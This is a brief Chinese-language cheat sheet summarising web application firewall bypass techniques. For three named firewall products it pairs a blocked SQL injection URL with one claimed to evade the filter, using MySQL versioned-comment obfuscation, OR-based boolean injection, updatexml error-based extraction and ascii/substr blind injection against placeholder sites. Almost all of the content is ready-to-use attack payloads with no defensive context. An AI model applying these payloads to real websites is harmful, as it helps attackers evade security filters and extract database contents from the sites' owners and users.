绕WAF手法总结

云锁

被拦截

http://www.test123.com/article.php?id=1%20union%20select%201,2,3

绕过

http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

被拦截

 http://www.xxx.com.cn/productshow.php?id=79'

绕过

 http://www.xxx.com.cn/productshow.php?id=79%20||%201=1

WTSWAF 

被拦截

 http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)

 绕过

http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)